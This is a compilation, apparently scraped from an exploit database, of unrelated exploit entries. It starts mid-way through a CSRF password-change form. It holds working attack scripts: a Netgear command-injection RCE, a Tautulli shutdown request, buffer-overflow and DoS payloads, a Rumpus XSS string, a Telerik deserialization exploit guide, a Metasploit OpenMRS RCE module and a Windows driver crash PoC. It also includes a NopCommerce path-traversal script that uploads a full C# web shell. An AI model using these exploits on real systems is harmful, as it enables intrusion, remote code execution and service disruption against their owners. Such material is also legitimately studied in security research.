<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="6,1,2" />
<input type="hidden" name="limited" value="0" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="minLength" value="1" />
<input type="hidden" name="maxLength" value="63" />
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />
<input type="hidden" name="isNumberRequired" value="" />
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="frmUserName" value="ismailtasdelen" />
<input type="hidden" name="frmNewPassword" value="Test1234!" />
<input type="hidden" name="frmRetypePassword" value="Test1234!" />
<input type="hidden" name="frmOldPassword" value="undefined" />
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulernability Type : Cross-Site Request Forgery (ShutDown)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
# been discovered that anonymous access can be achieved in applications that do
# not have a user login area and that the remote media server can be shut down.
# PoC Python Script :
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""
print(icon)
host = input("[+] HOST: ")
port = input("[+] PORT: ")
response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.
if response.status_code == 200:
print('[✓] Success!')
elif response.status_code != 200:
print('[✗] Unsuccessful!')
else:
exit()
# HTTP GET Request :
GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1
# CSRF PoC HTML :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
# PoC
#!/usr/bin/python
import urllib2
IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD
req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()
spl_word = "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result
# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.xnview.com
# Link Software : https://www.xnview.com/fr/xnview/#downloads
# Tested on OS: Windows 7
'''
Proof of Concept (PoC):
=======================
1.Download and install XnView
2.Open the XnView for Windows tools
3.Run the python operating script that will create a file (poc.txt)
4.Run the software " Tools -> Research -> A search window opens "
5.Copy and paste the characters in the file (poc.txt)
6.Paste the characters in the field 'File Name' and 'In' click on 'Research'
7.XnView for Windows Crashed
'''
#!/usr/bin/python
DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
poc = DoS
file = open("poc.txt,"w")
file.write(poc)
file.close()
print "POC Created by ZwX"
# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS
import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
def proxy(flag):
return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None
def geturl(baseurl, type):
if type == "login":
return baseurl + "/login"
elif type == "mv":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
elif type == "mkdir":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
elif type == "put":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
elif type == "contactus":
return baseurl + "/contactus"
else:
return ""
def login(email, password, url, proxy):
res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
cookie = res.cookies.get_dict()
soup = BeautifulSoup(res.text, features="html.parser")
token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
cookies = res.cookies.get_dict()
return { **cookies, **cookie }
def shellupload(email, password, url, proxy):
print("[+] Trying uploading shell from")
cookies = login(email, password, url, proxy)
# Rename Common Directory
requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Create Common Directory
requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Upload File into Common
requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Test if it is working
res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
soup = BeautifulSoup(res.text, features="html.parser")
test = soup.find("span", {"id" : "cmdResult"})
if test is None:
print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
else:
print("[+] Shell uploaded under contact us page")
def main():
parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
parser.add_argument(
'-e', '--email', required=True, type=str, help='Username')
parser.add_argument(
'-p', '--password', required=True, type=str, help='Password')
parser.add_argument(
'-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
parser.add_argument(
'-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
args = parser.parse_args()
shellupload(args.email, args.password, args.url, proxy(args.proxy))
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
main()
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368
Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
PoC:
Payload: ?!'><sVg/OnLoAD=alert`1`//
Vulnerable URL:
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//
Solution:
Update to the latest version released by vendor.
# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.avs4you.com/
# Link Software : http://www.avs4you.com/avs-audio-converter.aspx
# Tested on OS: Windows 7
'''
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in tihe official AVS Audio Converter.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue.
Analyze Registers:
==================
(1e74.1b78): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000
eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
42424242 ?? ???
0:000> !exchain
0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d)
0012fa30: 42424242
Invalid exception stack at 41414141
Note: EIP & ECX overwritten
Proof of Concept (PoC):
=======================
1.Download and install AVS Audio Converter
2.Open the AVS Audio Converter
3.Run the python operating script that will create a file (poc.txt)
4.copy and paste the characters found in the file (poc.txt) in the field "Exit folder"
5.Click on browse
6.EIP overwritten
'''
#!/usr/bin/python
buffer = "\x41" * 264
a = "\x42" * 4
b = "\x43" * 1000
poc = buffer + a + b
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).
Install
git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
python3 -m venv env
source env/bin/activate
pip3 install -r requirements.txt
Requirements
This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.
Usage
Compile mixed mode assembly DLL payload
In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.
build_dll.bat sleep.c
Upload and load payload into application via insecure deserialization
Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.
python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
[*] Local payload name: sleep_2019121205271355_x86.dll
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll
{'fileInfo': {'ContentLength': 75264,
'ContentType': 'application/octet-stream',
'DateJson': '1970-01-01T00:00:00.000Z',
'FileName': '1576142987.918625.dll',
'Index': 0},
'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
'Telerik.Web.UI, Version=<VERSION>, '
'Culture=neutral, '
'PublicKeyToken=<TOKEN>',
'TempFileName': '1576142987.918625.dll'}}
[*] Triggering deserialization...
<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...
[*] Response time: 13.01 seconds
In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).
Thanks
@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenMRS Java Deserialization RCE',
'Description' => %q(
OpenMRS is an open-source platform that supplies
users with a customizable medical record system.
There exists an object deserialization vulnerability
in the `webservices.rest` module used in OpenMRS Platform.
Unauthenticated remote code execution can be achieved
by sending a malicious XML payload to a Rest API endpoint
such as `/ws/rest/v1/concept`.
This module uses an XML payload generated with Marshalsec
that targets the ImageIO component of the XStream library.
Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
8 and Java 9.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Serra', # Vuln Discovery and PoC
'mpgn', # PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2018-19276' ],
[ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
[ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
[ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
],
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[ 'Linux',
{
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => [ 'unix', 'linux' ],
'CmdStagerFlavor' => 'printf'
}
]
],
'DisclosureDate' => '2019-02-04',
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(8081),
OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
])
register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
end
def check
res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
return CheckCode::Unknown("OpenMRS page unreachable.") unless res
return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
response = res.get_html_document
version = response.at('body//h3')
return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
version_no = version.text
version_no = version_no.match(/\d+\.\d+\.\d*/)
return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
version_no = Gem::Version.new(version_no)
if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
return CheckCode::Appears("OpenMRS platform version: #{version_no}")
end
CheckCode::Safe
end
def format_payload
payload_data = payload.encoded.to_s.encode(xml: :text)
payload_arr = payload_data.split(' ', 3)
payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
end
def read_payload_data(payload_cmd)
# payload generated with Marshalsec
erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
payload_data = File.binread(erb_path)
payload_data = ERB.new(payload_data).result(binding)
rescue Errno::ENOENT
fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
end
def execute_command(cmd, opts={})
cmd = cmd.encode(xml: :text)
xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
payload_data = read_payload_data(xml_data)
send_request_cgi(
'method' => 'POST',
'uri' => rest_uri,
'headers' => { 'Content-Type' => 'text/xml' },
'data' => payload_data
)
end
def exploit
chk_status = check
print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
fail_with(Failure::NoTarget, 'Target is not vulnerable')
end
cmds = generate_cmdstager(:concat_operator => '&&')
print_status('Sending payload...')
cmds.first.split('&&').map { |cmd| execute_command(cmd) }
end
end
The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges.
The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code:
static int
wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
{
...
error = falloc(p, &fp, &indx, ctx);
if (error) goto cleanup;
fp_alloc_successful = true;
...
proc_fdlock(p);
procfdtbl_releasefd(p, indx, NULL);
fp_drop(p, indx, fp, 1);
proc_fdunlock(p);
...
error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
if (error) goto cleanup;
...
cleanup:
if (error) {
if (fp_alloc_successful) fp_free(p, indx, fp);
...
}
First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running.
This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else.
One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible.
The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for. Usually this will generate a panic with the message "a freed zone element has been modified".
Tested on macOS 10.14.6 (18G87).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47791.zip
# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
# Date: 2019-12-20
# Exploit author: vportal
# Vendor homepage: http://www.microsoft.com
# Version: Windows 10 1803 x86
# Tested on: Windows 10 1803 x86
# CVE: N/A
# A Null pointer deference exists in the WARPGPUCMDSYNC function of the
# BasicRender.sys driver. An unprivileged user can trigger the vulnerability
# to crash the system and deny the service to the rest of the users.
*PoC:*
#include <Windows.h>
#include <d3dkmthk.h>
D3DKMT_CREATEDEVICE* device = NULL;
device = new D3DKMT_CREATEDEVICE();
D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
D3DKMTEnumAdapters(&enumAdapter);
device->hAdapter = enumAdapter.Adapters[1].hAdapter;
logger(log_counter, "EnumAdapter");
D3DKMTCreateDevice(device);
D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
contextVirtual->hDevice = device->hDevice;
char data[0x200] = { 0 };
memset(data, 0xff, 0x200);
contextVirtual->PrivateDriverDataSize = 0x200;
contextVirtual->pPrivateDriverData = data;
contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
contextVirtual->Flags.InitialData = 0x000001;
contextVirtual->Flags.NullRendering = 0x0;
D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
submitCommand = new D3DKMT_SUBMITCOMMAND();
submitCommand->BroadcastContext[0] = 0x40000240;
for (int i = 0; i < 0x10; i++)
submitCommand->WrittenPrimaries[i] = 0x0;
submitCommand->PresentHistoryToken = 0x100;
submitCommand->Commands = 0x004b39;
submitCommand->CommandLength = 0x00000d;
submitCommand->BroadcastContext[0] = contextVirtual->hContext;
submitCommand->BroadcastContextCount = 0x1;
submitCommand->Flags.PresentRedirected = 0x1;
submitCommand->PrivateDriverDataSize = 0x130;
char* PrivateData = NULL;
PrivateData = new char[submitCommand->PrivateDriverDataSize];
memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
*(DWORD*)(PrivateData + 0x118) = 0x434e5953;
*(DWORD*)(PrivateData + 0x11c) = 0x18;
*(DWORD*)(PrivateData + 0x120) = 0x000110;
*(DWORD*)(PrivateData + 0x124) = 0x000420;
*(DWORD*)(PrivateData + 0x128) = 0x0;
*(DWORD*)(PrivateData + 0x12c) = 0x000428;
submitCommand->pPrivateDriverData = PrivateData;
D3DKMTSubmitCommand(submitCommand);
--------------------------------------------------------------------------
*Crash dump*:
STACK_TEXT:
8afae92c 8fe82cb2 8afae958 fffffffd 0000048c
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0
BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000
BasicRender!WarpKMSubmitCommandVirtual+0x87
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6
dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
8afaea08 92b19db6 90114c30 8afaea68 b78da008
dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860
dxgmms2!VidSchiSendToExecutionQueue+0x526
8afaeb90 92b764a9 00000000 945f5a80 00000000
dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000
